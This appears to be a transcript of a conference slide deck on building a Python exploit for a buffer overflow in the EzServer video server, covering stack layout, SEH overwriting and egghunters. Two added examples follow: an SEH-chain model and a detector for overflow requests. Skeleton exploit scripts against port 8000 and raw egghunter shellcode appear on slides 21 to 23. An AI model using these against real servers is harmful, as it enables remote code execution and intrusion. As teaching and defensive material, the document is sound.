Exploit Development: EzServer Buffer Overflow by Tom Gregory


EzServer is a video server that can stream in full HD quality to various machines. A buffer overflow was found in the EzServer application, which runs on port 8000. An attacker can send malicious code to port 8000 and obtain access equal to the privileges of the EzServer application. In this presentation, the author walks through the process of building an exploit for the EzServer application using Python.

Tom Gregory: Security consultant at Spentera, Metasploit exploit developer/contributor.



  • The stack is used for function calls. There are 2 registers on the CPU associated with the stack, EBP and ESP. ESP points to the top of the stack, whereas EBP points to the beginning of the current frame. When a function is called, the arguments, EIP and EBP are pushed onto the stack. EBP is then set to ESP, and ESP is decremented to make space for the function's local variables.

    1. EXPLOIT DEVELOPMENT WITH PYTHON
       Tom Gregory, id:python Gathering, 27 April 2013
    2. AGENDA
       • Memory
       • Stack/Buffer Overflow
       • Structured Exception Handler (SEH)
       • Escape from small space
       • Egghunter
       • Demo
    3. PROCESS MEMORY LAYOUT
       From the top of memory (0xFFFFFFFF, high addresses) down to 0x00000000 (low addresses):
       • Args./Environment
       • Stack (grows down by procedure calls)
       • Unused memory
       • Heap (dynamic data; grows up, e.g. by malloc and new)
       • Static data (.data)
       • Program code (.text)
    4. STACK BUFFER OVERFLOW
           #include <string.h>

           void foo(char *bar)
           {
               char c[12];
               strcpy(c, bar); // no bounds checking: bar longer than 11 bytes overruns c
               // ...
           }

           int main(int argc, char **argv)
           {
               foo(argv[1]);
               return 0;
           }
    5. STACK BUFFER OVERFLOW
       Stack frame of foo, listed from lower to higher memory address (the stack grows toward lower addresses):
       • Unallocated stack
       • char c[12]
       • char *bar
       • Saved frame pointer (EBP)
       • Return address (EIP)
       • Parent routine's stack
    6. STACK BUFFER OVERFLOW
       Same frame after strcpy copies "hello": c[12] now holds h e l l o \0, and bar, the saved EBP, the return address and the parent routine's stack are untouched.
    7. STACK BUFFER OVERFLOW
       Fill the stack with 'A' (0x41): the rows of A A A A run past c[12], over bar and the saved frame pointer, and the four bytes that follow, \x08 \x35 \xc0 \x80, land on the return address. Read little endian, the overwritten return address is 0x80c03508; the parent routine's stack lies beyond it.
    8. WHAT IS SEH?
       This structure (also called a SEH record) is 8 bytes and has 2 elements (4 bytes each):
       • a pointer to the next exception_registration structure (in essence, to the next SEH record, in case the current handler is unable to handle the exception)
       • a pointer to the address of the actual code of the exception handler (SE Handler)
    9. WHAT IS SEH?
       Image was taken without permission from http://images.google.com
    10. LOOK AT THE SEH STRUCTURE
        Beginning of the SEH chain:
        • The SEH chain is placed at the top of the main data block
        • It is also called the FS:[0] chain (on Intel: mov [reg], dword ptr fs:[0])
        End of the SEH chain:
        • Indicated by 0xFFFFFFFF
        • Will trigger improper termination of the program
    11. HOW SEH WORKS?
        TEB FS:[0] = 0012FF40 (head of the chain). Stack contents:
        0012FF40  0012FFB0 : next SEH record
        0012FF44  7C839AD8 : SE Handler
        0012FFB0  0012FFE0 : next SEH record
        0012FFB4  0040109A : SE Handler
        0012FFE0  FFFFFFFF : next SEH record
        0012FFE4  7C839AD8 : SE Handler
    12. PROTECTIONS AGAINST SEH
        XOR
        • Before the exception handler is called, all registers are XORed with each other, so they all point to 0x00000000
        DEP & Stack Cookies
        • Stack Cookies (Canary) are set up via C++ compiler options
        • DEP marks the stack memory as non-executable. It was introduced with Windows XP SP2 and Windows 2003, and is enabled by default on Windows Vista and 7
        • Those two protections can make it harder to build exploits
    13. PROTECTIONS AGAINST SEH
        SafeSEH
        • Additional protection was added to compilers, helping to stop the abuse of SEH overwrites
        • It checks the original value of SEH; if it is overwritten, SafeSEH will try to bring it back to the original value
    14. ABUSING SEH
        On the direct RET technique: simply find an instruction to jump to the stack, done.
        On SEH based:
        • You cannot simply jump to the stack, because the registers are XORed
        • We can take advantage of this exception handling condition by overwriting the SE Handler address
        • The OS will know the exception handling routine, and pass it to the next SEH record
        • The pointer to the next SEH record will bring us to the shellcode. Game over!
    15. ABUSING SEH
        In other words, the payload must do the following things:
        • Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won't kick in
        • Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)
        • Overwrite the SE handler with a pointer to an instruction that will bring you back to the next SEH record and execute the jumpcode
        • The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten "pointer to next SEH record" will jump to it
    16. ABUSING SEH
        When the exception occurs, the stack looks like this (top of stack: our pointer to the next SEH record's address):
        • Possible values to overwrite the SE Handler with are POP something, POP something and RETN to the stack
        • It will POP the address that sits at the top of the stack, POP again to take the second address, and RETN to execute the third address (which is now at the top of the stack)
    17. ABUSING SEH
        Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
    18. ESCAPE FROM SMALL SPACE
        • Use Egghunter, "staged shellcode"
        • Use a small amount of custom shellcode to find the actual "bigger" shellcode (the egg), by searching the entire memory for the final shellcode
    19. EGGHUNTER
        There are 3 conditions that are important in order for this technique to work:
        • We must be able to jump to (jmp, call, push/ret) and execute "some" shellcode, the egghunter
        • The final shellcode must be available somewhere in memory (stack/heap/...)
        • You must "tag" or prepend the final shellcode with a unique string/marker/tag. This means that we will have to define the marker in the egghunter code, and also write it just in front of the actual shellcode
    20. ENOUGH TALKING!
    21. 1ST SKELETON EXPLOIT: CRASH IT!
            #!/usr/bin/python
            from socket import *

            junk = "\x41" * 10000           # 10000 bytes of 'A'
            s = socket(AF_INET, SOCK_STREAM)
            s.connect(('x.x.x.x', 8000))     # EzServer listens on port 8000
            print "[+] Launching attack.."
            s.send("GET /" + junk + " HTTP/1.0\r\n\r\n\r\n")
            s.close()
    22. 2ND SKELETON EXPLOIT: EIP OVERWRITE
            #!/usr/bin/python
            from socket import *

            junk = [random data generated from msf]   # cyclic pattern, to locate the EIP offset
            s = socket(AF_INET, SOCK_STREAM)
            s.connect(('x.x.x.x', 8000))
            print "[+] Launching attack.."
            s.send("GET /" + junk + " HTTP/1.0\r\n\r\n\r\n")
            s.close()
    23. 3RD SKELETON EXPLOIT: SMALL SPACE
        Egghunter:
            "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
            "\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    24. 4TH FINAL EXPLOIT
        • Exploit DB: http://www.exploit-db.com/exploits/19266/
        • Metasploit: http://www.exploit-db.com/exploits/19291/
          http://www.metasploit.com/modules/exploit/windows/http/ezserver_http
    25. EOF
        tom@spentera.com
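Added example (not from the slides, Exploit DB or the Metasploit module): a small Python model of the SEH chain on slide 11, built from the record addresses and values on that slide and packed little endian as slide 7 shows for the return address. It walks the chain from FS:[0] the way the exception dispatcher does, including the check that every record lies inside the stack bounds and is 4-byte aligned; a record covered by the 0x41 filler of slide 7 fails that check. The stack bounds (0x0012FF00 to 0x00130000) and the zero filler around the records are assumptions made for the image.

```python
import struct

# Constructed 32-bit stack image: the three SEH records and their values come
# from slide 11, everything else is zero filler. Bounds are assumptions.
STACK_LOW = 0x0012FF00
STACK_HIGH = 0x00130000
FS0 = 0x0012FF40                       # TEB FS:[0], head of the chain
END_OF_CHAIN = 0xFFFFFFFF              # terminator (slide 10)

SLIDE_RECORDS = {
    # record address: (next SEH record, SE handler)
    0x0012FF40: (0x0012FFB0, 0x7C839AD8),
    0x0012FFB0: (0x0012FFE0, 0x0040109A),
    0x0012FFE0: (END_OF_CHAIN, 0x7C839AD8),
}


def build_stack_image(records=SLIDE_RECORDS):
    """Lay the records out little endian (as on slide 7) in a bytes image."""
    image = bytearray(STACK_HIGH - STACK_LOW)
    for addr, (nxt, handler) in records.items():
        off = addr - STACK_LOW
        image[off:off + 8] = struct.pack("<II", nxt, handler)
    return bytes(image)


def read_record(image, addr):
    """Return (next, handler) of the 8-byte record stored at addr."""
    off = addr - STACK_LOW
    return struct.unpack("<II", image[off:off + 8])


def walk_seh_chain(image, head=FS0, max_records=64):
    """Follow the chain from FS:[0] as the dispatcher does.

    Returns a list of (record_addr, next, handler). Raises ValueError when a
    record pointer is not 4-byte aligned, lies outside the stack bounds or the
    chain never reaches 0xFFFFFFFF; the x86 dispatcher in ntdll refuses
    misaligned or out-of-stack records in the same way.
    """
    chain = []
    addr = head
    while addr != END_OF_CHAIN:
        if len(chain) >= max_records:
            raise ValueError("SEH chain too long or cyclic")
        if addr % 4 or not (STACK_LOW <= addr <= STACK_HIGH - 8):
            raise ValueError("SEH record 0x%08X is outside the stack" % addr)
        nxt, handler = read_record(image, addr)
        chain.append((addr, nxt, handler))
        addr = nxt
    return chain


def overwrite_record(image, addr, filler=b"A" * 8):
    """Return a copy of the image where the record at addr is covered by the
    filler bytes (0x41, as on slide 7), the way a stack overflow leaves it."""
    image = bytearray(image)
    off = addr - STACK_LOW
    image[off:off + len(filler)] = filler
    return bytes(image)


if __name__ == "__main__":
    good = build_stack_image()
    for rec in walk_seh_chain(good):
        print("record 0x%08X: next 0x%08X  handler 0x%08X" % rec)
    try:
        walk_seh_chain(overwrite_record(good, 0x0012FFB0))
    except ValueError as err:
        print("corrupted chain rejected:", err)
```

Walking the intact image yields the three records of slide 11 in order; after the second record is covered by 'A' bytes, its next pointer reads 0x41414141, which is neither aligned nor on the stack, so the walk stops with an error instead of following it.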
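Added example, not from the slides or the Metasploit module: a defender-side check over constructed request lines of the kind a proxy or IDS would record for the port 8000 listener. It flags the traits the three skeleton exploits (slides 21 to 23) rely on: a request-URI far longer than anything legitimate (slide 21 sends 10000 bytes), a long run of one repeated byte, and the egg marker the egghunter on slide 23 scans for (its bytes \xb8\x77\x30\x30\x74 load the tag "w00t", and the egg is that tag twice). The URI length threshold, the run length and the sample lines are assumptions.

```python
# Constructed sample of request lines, as a reverse proxy or IDS might log them
# for the EzServer HTTP listener on port 8000 (not captured traffic).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /stream/channel1.ts HTTP/1.1",
    "GET /" + "A" * 10000 + " HTTP/1.0",                        # slide 21 style padding
    "GET /" + "B" * 300 + "w00tw00t" + "C" * 200 + " HTTP/1.0",  # egg tag before a payload
]

MAX_URI_LEN = 1024      # assumption: legitimate EzServer URIs are far shorter
MAX_RUN = 256           # assumption: no real path repeats one byte this often
EGG_TAG = b"w00t" * 2   # marker the slide 23 egghunter searches memory for


def request_uri(line):
    """Second token of the request line; empty string if malformed."""
    parts = line.split(" ")
    return parts[1] if len(parts) >= 2 else ""


def longest_run(s):
    """Length of the longest run of a single repeated character."""
    best = cur = 0
    prev = None
    for ch in s:
        cur = cur + 1 if ch == prev else 1
        prev = ch
        best = max(best, cur)
    return best


def inspect_request(line):
    """Return a list of findings for one request line (empty means normal)."""
    uri = request_uri(line)
    findings = []
    if len(uri) > MAX_URI_LEN:
        findings.append("oversized-uri:%d" % len(uri))
    if longest_run(uri) >= MAX_RUN:
        findings.append("repeated-byte-padding")
    if EGG_TAG in uri.encode("latin-1", "replace"):
        findings.append("egghunter-tag")
    return findings


def scan(lines):
    """Map index of each suspicious line to its findings."""
    hits = {}
    for i, line in enumerate(lines):
        found = inspect_request(line)
        if found:
            hits[i] = found
    return hits


if __name__ == "__main__":
    for idx, found in scan(SAMPLE_REQUESTS).items():
        print("line %d: %s" % (idx, ", ".join(found)))
```

The first two lines pass; the third is flagged for its 10001-byte URI and the run of 'A', the fourth for the run of 'B' and the doubled egg tag. The length checks catch the crash and EIP-overwrite skeletons regardless of their content, while the tag check only helps when the egg is sent in the clear, so it should sit beside the length checks rather than replace them.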